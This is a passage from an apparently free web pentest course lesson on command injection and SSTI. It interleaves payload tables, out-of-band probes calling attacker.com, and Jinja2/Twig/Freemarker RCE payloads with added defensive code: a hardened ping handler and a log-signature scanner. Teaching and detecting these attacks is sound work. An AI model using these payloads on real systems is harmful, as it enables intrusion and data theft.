Web Application Penetration Testing Complete Masterclass

🌐 Web Pentest · Both · Beginner · 16 modules · 2.7h
From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.
Instructor: lazyhackers · Free Course

Curriculum — 5 sections · 16 modules · 2.7h


Command Injection & SSTI

Lesson · 10 min

Command Injection Payloads

When applications pass user input to OS shell commands — ping, nslookup, file operations, image conversion — test every such field.

Payload             OS       Technique
; whoami            Unix     Semicolon: run second command after first completes
| id                Unix     Pipe: first command output goes to second
&& cat /etc/passwd  Unix     AND: run only if first command succeeds
|| id               Unix     OR: run only if first command fails
`id`                Unix     Backtick command substitution
$(id)               Unix     Dollar-sign command substitution
%0a id              Unix     URL-encoded newline: bypasses inline filter
127.0.0.1; id       Unix     Classic ping field injection test
& whoami            Windows  Background execution separator
| dir               Windows  Windows pipe: list directory
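As an added example (not code from the course or its instructor), here is the ping handler behind the table's scenario written the vulnerable way next to a hardened version in Python. The unsafe function builds a single shell string, which is exactly why every payload in the table becomes a second command; the safe version validates the value against an allowlist (IP literal or plain hostname) and hands an argv list to subprocess with no shell involved. The hostname regex, the function names and the benign inputs are this example's own assumptions; the injection payloads are the ones from the table.

```python
# Added example, not from the course: vulnerable vs. hardened ping endpoint.
import ipaddress
import re
import subprocess
from typing import List, Optional

# Hostname allowlist (RFC 1123 style labels: letters, digits, hyphens, dot-separated).
# This regex is an assumption of this example; tune it to what your app must accept.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_unsafe(host: str) -> str:
    """The vulnerable pattern: user input concatenated into a shell command line.
    Returned instead of executed so the effect of injection can be inspected;
    in the real bug this string goes to subprocess.run(cmd, shell=True)."""
    return f"ping -c 1 {host}"


def validate_host(host: str) -> Optional[str]:
    """Return the host if it is an IP literal or a plain hostname, else None.
    No stripping: whitespace, ; | & ` $ ( ) and newlines are rejected outright,
    so nothing a shell would interpret can reach the command."""
    try:
        return str(ipaddress.ip_address(host))   # accepts IPv4 and IPv6 literals
    except ValueError:
        pass
    return host if _HOSTNAME_RE.match(host) else None


def build_ping_safe(host: str) -> Optional[List[str]]:
    """The hardened pattern: allowlist validation plus an argv list. The kernel
    execs ping directly, so a value like 'whoami' is only ever a DNS name."""
    checked = validate_host(host)
    if checked is None:
        return None
    return ["ping", "-c", "1", checked]


def run_ping(host: str) -> Optional[subprocess.CompletedProcess]:
    """Execute the validated command without a shell; None if input was rejected."""
    argv = build_ping_safe(host)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False)


# Constructed inputs: the payloads from the table above plus a few benign hosts.
INJECTION_PAYLOADS = [
    "; whoami", "| id", "&& cat /etc/passwd", "|| id", "`id`", "$(id)",
    "%0a id", "127.0.0.1; id", "& whoami", "| dir",
]
BENIGN_HOSTS = ["127.0.0.1", "example.com", "2001:db8::1"]


def rejected_payloads() -> List[str]:
    """Every table payload the validator refuses (expected: all of them)."""
    return [p for p in INJECTION_PAYLOADS if validate_host(p) is None]


if __name__ == "__main__":
    for p in INJECTION_PAYLOADS + BENIGN_HOSTS:
        print(f"{p!r:22} unsafe: {build_ping_unsafe(p)!r:34} safe argv: {build_ping_safe(p)}")
```

The point to take from the two builders is that the fix is not a blocklist of the characters in the table (the `%0a` row shows how such filters get bypassed) but an allowlist plus the removal of the shell from the call path; even if validation were somehow skipped, an argv list passes the whole value to ping as one argument.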

Blind Command Injection — No Output Returned

# Time-based detection
127.0.0.1; sleep 5
127.0.0.1 & timeout /T 5    # Windows

# Out-of-band DNS detection (use Burp Collaborator or interactsh)
127.0.0.1; nslookup attacker.com
127.0.0.1; curl https://attacker.com/$(id)
127.0.0.1; ping -c 1 $(whoami).attacker.com

# interactsh — free OOB detection server
interactsh-client   # gives unique URL like xyz.oast.pro
127.0.0.1; curl https://$(whoami).xyz.oast.pro

Server-Side Template Injection (SSTI) Detection

When user input is embedded inside a server-side template (Jinja2, Twig, Freemarker) and rendered by the engine, the input is evaluated as template code, which can lead to RCE.

# STEP 1 — Detection (math expression evaluated = SSTI vulnerable)
{{7*7}}       # Returns 49 = Jinja2 or Twig
${7*7}        # Returns 49 = Freemarker or Mako
<%= 7*7 %>    # Returns 49 = ERB (Ruby)

# STEP 2 — Identify engine
{{7*'7'}}     # Returns '7777777' = Jinja2 (Python)
{{7*'7'}}     # Returns 49 = Twig (PHP)

# ── JINJA2 RCE (Python/Flask/Django) ──────────────────────────
{{ config.items() }}                        # Dump config including SECRET_KEY

# Full RCE payload (find subprocess in subclasses)
{{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate() }}

# ── TWIG RCE (PHP) ─────────────────────────────────────────────
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# ── FREEMARKER RCE (Java) ──────────────────────────────────────
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
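From the detection side, the probes in the "Blind Command Injection" section and the template expressions in the SSTI section are both visible in request logs before any exploitation succeeds. The following is an added example (not code from the course or its instructor) in Python: it parses combined-format access-log lines, URL-decodes each query parameter and matches the decoded value against signatures for both families. The log format, the IP addresses, the `probe.example.net` call-back host and all sample lines are constructed for this example; the signatures are derived from the payloads shown in the two sections.

```python
# Added example, not from the course: flag command-injection and SSTI probes in access logs.
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Signatures are applied to the URL-decoded parameter value, so "%0a id" is seen
# as a newline followed by "id", which is what a shell would see as well.
SIGNATURES = {
    "cmdi": [
        ("shell separator", re.compile(r"[;&|\n]\s*\w")),
        ("command substitution", re.compile(r"\$\([^)]*\)|`[^`]*`")),
        ("time-based probe", re.compile(r"\b(sleep\s+\d+|timeout\s+/T\s+\d+)", re.I)),
        ("out-of-band call-back", re.compile(r"\b(nslookup|curl|wget|dig)\s+\S*\.\S+", re.I)),
    ],
    "ssti": [
        ("template math probe",
         re.compile(r"(\{\{|\$\{|<%=)\s*\d+\s*\*\s*['\"]?\d+['\"]?\s*(\}\}|\}|%>)")),
        ("jinja2 gadget", re.compile(r"__class__|__mro__|__subclasses__|config\.items")),
        ("twig gadget", re.compile(r"_self\.env")),
        ("freemarker gadget", re.compile(r"<#assign|\?new\(\)")),
    ],
}

# Combined log format (constructed); only the fields the scanner needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def scan_request(target: str) -> List[dict]:
    """Return one finding per (parameter, signature) hit in a request target."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(raw)                 # second decode catches double encoding (%250a)
        for cls, sigs in SIGNATURES.items():
            for label, pattern in sigs:
                if pattern.search(value):
                    findings.append({"class": cls, "signature": label,
                                     "param": name, "value": value})
    return findings


def scan_log(text: str) -> List[dict]:
    """Parse each line and attach its request findings; unparseable lines are skipped."""
    out = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for f in scan_request(m["target"]):
            f.update({"line_no": line_no, "ip": m["ip"], "ts": m["ts"]})
            out.append(f)
    return out


def summarize(findings: List[dict]) -> Dict[str, int]:
    """Count findings per class, e.g. {'cmdi': 5, 'ssti': 2}."""
    return dict(sorted(Counter(f["class"] for f in findings).items()))


# Constructed sample: two benign requests, three ping-field probes, two template probes.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /tools/ping?host=127.0.0.1 HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /tools/ping?host=127.0.0.1%3B%20sleep%205 HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /tools/ping?host=127.0.0.1%3B%20nslookup%20probe.example.net HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2024:12:00:12 +0000] "GET /tools/ping?host=127.0.0.1%0aid HTTP/1.1" 200 512
198.51.100.4 - - [10/Mar/2024:12:01:00 +0000] "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 231
198.51.100.4 - - [10/Mar/2024:12:01:03 +0000] "GET /profile?name=%7B%7B%20config.items()%20%7D%7D HTTP/1.1" 200 231
198.51.100.9 - - [10/Mar/2024:12:02:00 +0000] "GET /profile?name=Alice HTTP/1.1" 200 231
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line_no']:>2} {f['ip']:<13} {f['class']:<5} "
              f"{f['signature']:<22} {f['param']}={f['value']!r}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

Two design notes. Decoding before matching is what makes the `%0a` bypass row from the earlier table visible, and a second `unquote` handles double encoding; a scanner that matches raw query strings misses both. The `shell separator` signature will also fire on legitimate `%26`-encoded ampersands in values, so in production it belongs on endpoints known to touch the OS (ping, lookup, conversion tools) rather than on every parameter, and the `sleep`/`timeout` and call-back signatures, which rarely appear in benign traffic, are the ones worth alerting on directly.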